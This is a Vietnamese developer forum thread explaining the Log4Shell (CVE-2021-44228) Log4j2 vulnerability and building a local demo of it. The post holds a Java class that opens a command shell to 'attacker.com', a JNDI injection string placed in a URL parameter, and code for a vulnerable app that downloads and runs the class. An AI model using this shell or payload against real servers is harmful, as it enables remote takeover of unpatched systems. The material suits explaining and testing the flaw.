Search
Ask A Question
In Process
Avatar
2
monkey Enlightened
Asked At: 1639368576000 In: Java
monkey Enlightened Asked At: 1639368576000 In: Java
Hiểu rõ về lỗ hổng của Apache Log4j2 (CVE-2021-44228)
Hiểu rõ về lỗ hổng của Apache Log4j2 (CVE-2021-44228)

Để hiểu rõ hơn chúng ta phải hiểu về log4j một chút. Log4j sử dụng chain of responsibility design pattern, thế nên ở bên trong nó sẽ có các Appender. Khi một dòng log kiểu logger.info("Hello: {}", param) thì đoạn log này sẽ chạy qua tất cả các appender thể thực hiện các công việc tương ứng, ví dụ in ra màn hình, ghi vào file, và trong đó có 1 lớp tên là: RoutingAppender. Lớp này sẽ gọi đến hàm StrSubstitutor.resolveVariable. Hàm này sẽ đi lấy giá trị của biến, và đau lòng thay, nó gọi lại đến lớp Interpolator.

Lớp Interpolator sẽ tìm kiếm qua nhiều giao thức, trong đó có giao thức JNDI để lấy ra giá trị của biến, và thế là bùm. Kẻ tấn công sẽ tạo ra 1 lớp thế này: 

public class Log4jShell {
    static {
        try {
            Socket socket = new Socket("attacker.com", 1234);
            Scanner scanner = new Scanner(socket.getInputStream());
            while(true) {
                String command = scanner.nextLine();
                ProcessBuilder pb = new ProcessBuilder(command);
                pb.start();
            }
        } catch (Exception e) {}
    }
}

Và hắn thông quan tham số name truyền lên server kiểu: https://web_site_cua_chung_ta/hello?name=${jndi://web_site_cua_ke_tan_cong.com/Log4jShell.class}, và cùng với câu lệnh logger ở trên. Lớp Interpolator sẽ lấy giá trị của biến bằng cách lấy lớp Log4jShell.class về, và thế là toang, kẻ tấn công sẽ có hẳn 1 cái terminal xịn sò trên server của chúng ta và muốn làm gì thì làm.

Nhược điểm của lỗ hổng lần này là nó làm cho cả thế giới tán loạn. Phải đi release lại toàn bộ các sản phẩm đang dùng 2.0 <= log4j-core <= 2.14.1.

Còn ưu điểm là nó cũng cho thấy được Java nó phổ biến và được sử dụng rộng rãi đến mức nào. Thế nên anh em cứ tự tin khi lựa chọn Java để làm ngôn ngữ lập trình backend cho mình và cho tổ chức của mình nhé.

Tham khảo thêm nếu anh em cần nhé: https://www.lunasec.io/docs/blog/log4j-zero-day/#how-you-can-prevent-future-attacks

  • 3 Answer(s)
  • 2578 Views
  • Answer
security log4j-core
Remain: 5
3 Answers
Avatar
monkey Enlightened
Added an answer at: 1639451904000
monkey Enlightened
Added an answer at: 1639451904000
Demo không sử dụng qua LDAP: 

package com.example.log4jshell;

import javax.naming.Context;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

import com.tvd12.ezyhttp.core.boot.EzyHttpApplicationBootstrap;

public final class Log4jShellStartup {

    private static final Logger LOGGER = LogManager.getLogger(Log4jShellStartup.class);

    public static void main(String[] args) throws Exception {
        LOGGER.info("start Log4jShell");
        System.setProperty(Context.INITIAL_CONTEXT_FACTORY, "com.example.log4jshell.AppContextFactory");
        System.setProperty(Context.PROVIDER_URL, "remote+http://localhost:8080");
        EzyHttpApplicationBootstrap.start(Log4jShellStartup.class);
    }
}


package com.example.log4jshell;

import java.util.Hashtable;

import javax.naming.Context;
import javax.naming.NamingException;
import javax.naming.spi.InitialContextFactory;

public class AppContextFactory implements InitialContextFactory {

    private final AppInitialContext context = new AppInitialContext();

    public AppContextFactory() throws NamingException {}

    @Override
    public Context getInitialContext(Hashtable environment) throws NamingException {
        return context;
    }
}


package com.example.log4jshell;

import java.io.File;
import java.util.Hashtable;

import javax.naming.NamingException;
import javax.naming.ldap.InitialLdapContext;

import com.tvd12.ezyhttp.client.HttpClient;

public class AppInitialContext extends InitialLdapContext {

    private final HttpClient httpClient;

    public AppInitialContext() throws NamingException {
        httpClient = HttpClient.builder().build();
    }
    @Override
    protected void init(Hashtable environment) throws NamingException { }

    @Override
    public Object lookup(String name) throws NamingException {
        try {
            httpClient.download(name, new File("target/classes"));
            Thread.sleep(300);
            Class clazz = Class.forName("Log4jShell");
            return clazz.newInstance();
        } catch (Exception e) {
            e.printStackTrace();
        }
        return null;
    }
}


package com.example.log4jshell.controller;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

import com.tvd12.ezyhttp.server.core.annotation.Controller;
import com.tvd12.ezyhttp.server.core.annotation.DoGet;
import com.tvd12.ezyhttp.server.core.annotation.RequestParam;

@Controller
public class HomeController {

    private final Logger logger = LogManager.getLogger(getClass());

    @DoGet("/hello")
    public String hello(@RequestParam String name) {
        logger.info("Hello: {}", name);
        return "Hello " + name;
    }
}
  • 0
  • Reply
Avatar
monkey Enlightened
Added an answer at: 1639452553000
monkey Enlightened
Added an answer at: 1639452553000
Demo không sử dụng qua LDAP (tiếp): 

import java.net.Socket;
import java.util.Scanner;

public class Log4jShell {
    static {
        try {
            System.out.println("Shell started");
            Socket socket = new Socket("localhost", 3006);
            Scanner scanner = new Scanner(socket.getInputStream());
            while(true) {
                String command = scanner.nextLine();
                ProcessBuilder pb = new ProcessBuilder(command);
                pb.start();
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

Chạy lệnh javac Log4jShell.java để tạo ra file Log4jShell.class

  • 0
  • Reply
Avatar
monkey Enlightened
Added an answer at: 1639454790000
monkey Enlightened
Added an answer at: 1639454790000
Demo không sử dụng qua LDAP (tiếp):

Cấu trúc thư mục dự án sẽ kiểu:

File application.properties: 

resources.enable=true

File log4j2.xml: 

<span><span><span><?</span>xml version=<span>"1.0"</span> encoding=<span>"UTF-8"</span><span>?></span></span>
<span><<span>Configuration</span> <span>status</span>=<span>"INFO"</span>></span>
  <span><<span>Appenders</span>></span>
    <span><<span>Console</span> <span>name</span>=<span>"LogToConsole"</span> <span>target</span>=<span>"SYSTEM_OUT"</span>></span>
      <span><<span>PatternLayout</span> <span>pattern</span>=<span>"%d</span></span></span><span>{HH:mm:ss.SSS}</span><span><span><span> [%t] %-5level %logger</span></span></span><span>{36}</span><span><span><span> - %msg%n"</span>/></span>
    <span></<span>Console</span>></span>
  <span></<span>Appenders</span>></span>
  <span><<span>Loggers</span>></span>
    <span><<span>Logger</span> <span>name</span>=<span>"com.example"</span> <span>level</span>=<span>"debug"</span> <span>additivity</span>=<span>"false"</span>></span>
      <span><<span>AppenderRef</span> <span>ref</span>=<span>"LogToConsole"</span>/></span>
    <span></<span>Logger</span>></span>
    <span><<span>Root</span> <span>level</span>=<span>"info"</span>></span>
      <span><<span>AppenderRef</span> <span>ref</span>=<span>"LogToConsole"</span>/></span>
    <span></<span>Root</span>></span>
  <span></<span>Loggers</span>></span>
<span></<span>Configuration</span>></span></span>

File pom.xml 

<span><span><span><?</span>xml version=<span>"1.0"</span> encoding=<span>"UTF-8"</span><span>?></span></span>
<span><<span>project</span> <span>xmlns</span>=<span>"http://maven.apache.org/POM/4.0.0"</span>
         <span>xmlns:xsi</span>=<span>"http://www.w3.org/2001/XMLSchema-instance"</span>
         <span>xsi:schemaLocation</span>=<span>"http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"</span>></span>
  <span><<span>parent</span>></span>
    <span><<span>groupId</span>></span>com.tvd12<span></<span>groupId</span>></span>
    <span><<span>artifactId</span>></span>ezyfox<span></<span>artifactId</span>></span>
    <span><<span>version</span>></span>1.0.2<span></<span>version</span>></span>
  <span></<span>parent</span>></span>
  <span><<span>modelVersion</span>></span>4.0.0<span></<span>modelVersion</span>></span>
  <span><<span>artifactId</span>></span>log4jshell<span></<span>artifactId</span>></span>

  <span><<span>properties</span>></span>
    <span><<span>log4j2.version</span>></span>2.11.2<span></<span>log4j2.version</span>></span>
    <span><<span>ezy.http.version</span>></span>0.2.0<span></<span>ezy.http.version</span>></span>
  <span></<span>properties</span>></span>

  <span><<span>dependencies</span>></span>
    <span><<span>dependency</span>></span>
      <span><<span>groupId</span>></span>com.tvd12<span></<span>groupId</span>></span>
      <span><<span>artifactId</span>></span>ezyhttp-server-boot<span></<span>artifactId</span>></span>
      <span><<span>version</span>></span>$</span><span>{ezy.http.version}</span><span><span></<span>version</span>></span>
    <span></<span>dependency</span>></span>
    <span><<span>dependency</span>></span>
      <span><<span>groupId</span>></span>com.tvd12<span></<span>groupId</span>></span>
      <span><<span>artifactId</span>></span>ezyhttp-client<span></<span>artifactId</span>></span>
      <span><<span>version</span>></span>$</span><span>{ezy.http.version}</span><span><span></<span>version</span>></span>
    <span></<span>dependency</span>></span>
    <span><<span>dependency</span>></span>
      <span><<span>groupId</span>></span>org.apache.logging.log4j<span></<span>groupId</span>></span>
      <span><<span>artifactId</span>></span>log4j-api<span></<span>artifactId</span>></span>
      <span><<span>version</span>></span>$</span><span>{log4j2.version}</span><span><span></<span>version</span>></span>
    <span></<span>dependency</span>></span>
    <span><<span>dependency</span>></span>
      <span><<span>groupId</span>></span>org.apache.logging.log4j<span></<span>groupId</span>></span>
      <span><<span>artifactId</span>></span>log4j-core<span></<span>artifactId</span>></span>
      <span><<span>version</span>></span>$</span><span>{log4j2.version}</span><span><span></<span>version</span>></span>
    <span></<span>dependency</span>></span>
  <span></<span>dependencies</span>></span>
<span></<span>project</span>></span></span>
  • 0
  • Reply
Ask A Question
  • Question(s) 1.0K
  • Answer(s) 2.2K
  • Best answer(s) 135
  • User(s) 513

Related Questions

Recent Activities

Show All Activities

Top Members

Trending Tags

.net .net core .net oop #formatdate abstract class access app access token ai android ansible anti-flooding apache poi api app architecture artificial intelligence assembly async asyncawait atomicboolean authentication backend backend nestjs background bash script batch bean big project binding bitcoin blockchain blog boot-nodes branch btree bucket4j buffered build bundle c# c# .net cache caching callback career career path cast câu hỏi centos chat cloud cloud reliability commit communication computer science concurrent config-css connection pool content-disposition contract controllerservice convert date to number cookie cors cosmos cosmos-sdk crawl data cron css database database migration datasource datastructure datetime deadlock debug decentralized exchange deep learning deploy contract design patterns design-pattern dev devops dex di distraction programing dns đồ án tốt nghiệp docker download draw.io du học dữ liệu lớn duration eclip editor elasticsearch email erc20 erc721 estimation eth ethereum ethereum login excel excel-object-mapper exception exception handle exception handler executor export compliance extensions exyfox ezyfox ezyfox-boot ezyfox-server ezyfoxserver ezyhttp ezyjpa ezymq-kafka ezyplatform ezyredis facebook fe filter floating point flutter format json freetank front-end frontend fullstack fulltextsearch future gallery game game-box game-room game-server gateway get get file zip git glide go golang gorilla graduation thesis graphql grapql grpc guide h2 database handy terminal hazelcast hibernate hibernateconfig html http https hyperloglog image index indexing integration-test intellij interface io ioc ipfs isolate issue it java java core java spring java web javacore javascript javaw jenkins jetbrains job join jotform jpa jquery js json json file json to object jsonproperty jsp jsp &amp; servlet junit-test jvm jwt kafka keep promise kerberos keycloak kotlin languague laravel library list load balancer load-balancing lock log log4j log4j-core login lỗi font lưu trữ machine learning macos mail mail template main map maria db math maven merge message queue messaging metamask microservice microservices migration mobile model mongo monitoring mq msgpack multi-threading multiple tenant multithread multithreading mysql n naming naming convention nan netcore netty network networking nft nft game nginx nio node.js nodejs non-blocking io null oop opensource optimize oracle orm otp message paginaiton pagination pancakeswap panic partition pdf pgpool phỏng vấn php plugin pointer postgresql postman pre private_key procedure profile programming programming-language project management promise properties push message android push notification push-noti python python unicode qr qrcode question queue rabbitmq react-native reactive reactjs reactjs download readmoretextview recyclerview redis refactor refresh token regex replica repository request resilence4j resource rest restful resttemplate roadmap room database ropssten ropsten round robin rust rxjava s3 schedule scheduled scheduled spring boot search security send email send mail serialization server servlet session shift jis singleton sjis slack smart contract soap socket socket server soft delete solution sosanh spring spring aop spring boot spring data jpa spring redis spring security spring websocket spring websocket cors spring-boot-test spring-jpa springboot springsecurity springwebflux mysql sql sql server sse ssl ssl email stackask storage stream stream api stress test stresstest structure trong spring boot study synchronize synchronized system environment variables tcp test thiết kế tầng trong dự án thread thread pool threadjava threadpool thymeleaf tomcat totp tracking location transaction transfer transfer git udp uniswap unit test unity upload upload file utf-8 file validate validate date vector video call vietqr view volatile vue vue cli vuejs watermark web web3 web3 client webassembly webflux webpack webrtc websocket windows 11 winforms wordpress work xss zip file zookeeper